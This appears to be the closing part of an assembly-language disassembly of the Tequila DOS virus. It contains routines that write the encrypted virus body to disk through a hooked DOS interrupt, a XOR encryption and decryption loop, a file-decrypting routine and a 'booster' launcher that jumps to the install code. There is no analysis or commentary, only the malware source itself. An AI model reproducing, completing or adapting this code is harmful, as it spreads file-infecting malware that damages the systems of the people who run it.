JE 0A0E ;Masm Mod. Needed

TEST AL,4

JE 09F7 ;Masm Mod. Needed

TEST AL,8

JE 09F1 ;Masm Mod. Needed

MOV W[SI],0C789

INC SI

INC SI

JMP RET ;Masm Mod. Needed

MOV B[SI],090

INC SI

JMP RET ;Masm Mod. Needed

MOV AL,085

DEC BP

ES MOV AH,B[BP] ;Masm Mod. Needed

TEST AH,2

JE 0A05 ;Masm Mod. Needed

DEC AL

OR AH,0C0

MOV W[SI],AX

INC SI

INC SI

JMP RET ;Masm Mod. Needed

DEC BP

ES TEST B[BP],2 ;Masm Mod. Needed

JE 0A1A ;Masm Mod. Needed

MOV AL,039

JMP 09F9 ;Masm Mod. Needed

MOV B[SI],0FC

INC SI

RET

MAKE_THE_DISK_WRITE:

CALL PERFORM_ENCRYPTION_DECRYPTION

MOV AH,040

MOV BX,W[09A4]

MOV DX,0

MOV CX,09A4

PUSHF

CALL D[09B4] ;Masm Mod. Needed

JB 0A37 ;Masm Mod. Needed

SUB AX,CX

PUSHF

CMP B[0A39],028 ;Masm Mod. Needed

JNE 0A44 ;Masm Mod. Needed

MOV B[0A39],0 ;Masm Mod. Needed

CALL PERFORM_ENCRYPTION_DECRYPTION

POPF

RET

PERFORM_ENCRYPTION_DECRYPTION:

MOV BX,0

MOV SI,0960

MOV CX,0960

MOV DL,B[SI]

XOR B[BX],DL

INC SI

INC BX

CMP SI,09A0

JB 0A61 ;Masm Mod. Needed

MOV SI,0960

LOOP 0A52 ;Masm Mod. Needed

RET

THE_FILE_DECRYPTING_ROUTINE:

PUSH CS

POP DS

MOV BX,4

MOV SI,0964

MOV CX,0960

MOV DL,B[SI]

ADD B[BX],DL

INC SI

INC BX

CMP SI,09A4

JB 0A7E ;Masm Mod. Needed

MOV SI,0964

LOOP 0A6F ;Masm Mod. Needed

JMP 0390 ;Masm Mod. Needed

;========== THE FOLLOWING IS NOT PART OF THE VIRUS ========

;========== BUT IS MERELY THE BOOSTER. ========

START:

LEA W[0104],EXIT ;Masm Mod. Needed

MOV W[0106],CS ;Masm Mod. Needed

MOV BX,CS

SUB W[0106],BX ;Masm Mod. Needed

JMP INSTALL

EXIT:

INT 020

TEQUILA ENDP

CODE_SEG ENDS

END TEQUILA